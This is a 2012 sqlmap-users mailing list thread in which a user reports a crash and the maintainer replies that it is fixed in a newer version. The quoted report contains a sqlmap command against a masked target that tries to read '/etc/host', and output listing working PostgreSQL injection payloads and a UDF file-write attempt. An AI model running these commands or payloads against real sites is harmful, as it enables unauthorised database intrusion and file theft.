Hi.

I believe that this was fixed few weeks ago. Please update to have it fixed.

Kind regards,
Miroslav Stampar
On Dec 17, 2012 10:01 AM, "beta" <beta9...@gmail.com> wrote:

> g:\progz\Python27>python.exe sqlmap-2012\sqlmap.py -u 
> "http://********************/index.php?f_id=589&main=1";
> -p main --file-read="/etc/host"
>
>     sqlmap/1.0-dev-621ae58 - automatic SQL injection and database takeover
> tool
>     http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user'
> s responsibility to obey all applicable local, state and federal laws.
> Developers assume no liability and are not respon
> sible for any misuse or damage caused by this program
>
> [*] starting at 10:34:52
>
> [10:34:52] [INFO] resuming back-end DBMS 'postgresql'
> [10:34:52] [INFO] testing connection to the target url
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: GET
> Parameter: main
>     Type: error-based
>     Title: PostgreSQL AND error-based - WHERE or HAVING clause
>     Payload: f_id=589&main=1 AND
> 4036=CAST((CHR(58)||CHR(104)||CHR(111)||CHR(97)||CHR(58))||(SELECT (CASE
> WHEN (4036=403
> 6) THEN 1 ELSE 0
> END))::text||(CHR(58)||CHR(117)||CHR(116)||CHR(117)||CHR(58)) AS NUMERIC)
>
>     Type: stacked queries
>     Title: PostgreSQL > 8.1 stacked queries
>     Payload: f_id=589&main=1; SELECT PG_SLEEP(5)--
>
>     Type: AND/OR time-based blind
>     Title: PostgreSQL > 8.1 AND time-based blind
>     Payload: f_id=589&main=1 AND 5444=(SELECT 5444 FROM PG_SLEEP(5))
> ---
> [10:34:53] [INFO] the back-end DBMS is PostgreSQL
> web application technology: Nginx, PHP 5.2.17
> back-end DBMS: PostgreSQL
> [10:34:53] [INFO] fingerprinting the back-end DBMS operating system
> [10:34:53] [WARNING] time-based comparison needs larger statistical model.
> Making a few dummy requests, please wait..
> [10:34:57] [INFO] heuristics detected web page charset 'ascii'
> [10:34:57] [WARNING] it is very important not to stress the network
> adapter's bandwidth during usage of time-based queri
> es
> [10:34:58] [INFO] the back-end DBMS operating system is Linux
> [10:34:59] [INFO] fetching file: '/etc/host'
> [10:34:59] [INFO] testing if current user is DBA
>
> [10:34:59] [INFO] detecting back-end DBMS version from its banner
>
> what is the back-end database management system architecture?
> [1] 32-bit (default)
> [2] 64-bit
> > 2
> [10:35:01] [INFO] checking if UDF 'sys_fileread' already exist
> [10:35:02] [WARNING] reflective value(s) found and filtering out
>
> do you want confirmation that the file '/tmp/libspnox.so' has been
> successfully written on the back-end DBMS file system
> ? [Y/n]
>
> [10:35:24] [WARNING] it looks like the file has not been written, this can
> occur if the DBMS process' user has no write
> privileges in the destination path
> [10:35:26] [INFO] creating UDF 'sys_fileread' from the binary UDF file
>
> [10:35:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-621ae58, retry
> your run with the latest development version
> from the GitHub repository. If the exception persists, please send by
> e-mail to 'sqlmap-users@lists.sourceforge.net' or
> open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new'
> with the following text and any information req
> uired to reproduce the bug. The developers will try to reproduce the bug,
> fix it accordingly and get back to you.
> sqlmap version: 1.0-dev-621ae58
> Python version: 2.7.2
> Operating system: nt
> Command line: sqlmap-2012\sqlmap.py -u
> *************************************** --file-read=/etc/host
> Technique: STACKED
> Back-end DBMS: PostgreSQL (fingerprinted)
> Traceback (most recent call last):
>   File "g:\progz\Python27\sqlmap-2012\_sqlmap.py", line 73, in main
>     start()
>   File "g:\progz\Python27\sqlmap-2012\lib\controller\controller.py", line
> 568, in start
>     action()
>   File "g:\progz\Python27\sqlmap-2012\lib\controller\action.py", line 150,
> in action
>     conf.dumper.rFile(conf.rFile, conf.dbmsHandler.readFile(conf.rFile))
>   File "g:\progz\Python27\sqlmap-2012\plugins\generic\filesystem.py", line
> 234, in readFile
>     fileContent = self.__unhexString(fileContent)
>   File "g:\progz\Python27\sqlmap-2012\plugins\generic\filesystem.py", line
> 41, in __unhexString
>     if len(hexStr) % 2 != 0:
> TypeError: object of type 'NoneType' has no len()
>
> [*] shutting down at 10:35:28
>
> g:\progz\Python27>
>
>
> ------------------------------------------------------------------------------
> LogMeIn Rescue: Anywhere, Anytime Remote support for IT. Free Trial
> Remotely access PCs and mobile devices and provide instant support
> Improve your efficiency, and focus on delivering more value-add services
> Discover what IT Professionals Know. Rescue delivers
> http://p.sf.net/sfu/logmein_12329d2d
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
------------------------------------------------------------------------------
LogMeIn Rescue: Anywhere, Anytime Remote support for IT. Free Trial
Remotely access PCs and mobile devices and provide instant support
Improve your efficiency, and focus on delivering more value-add services
Discover what IT Professionals Know. Rescue delivers
http://p.sf.net/sfu/logmein_12329d2d
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Reply via email to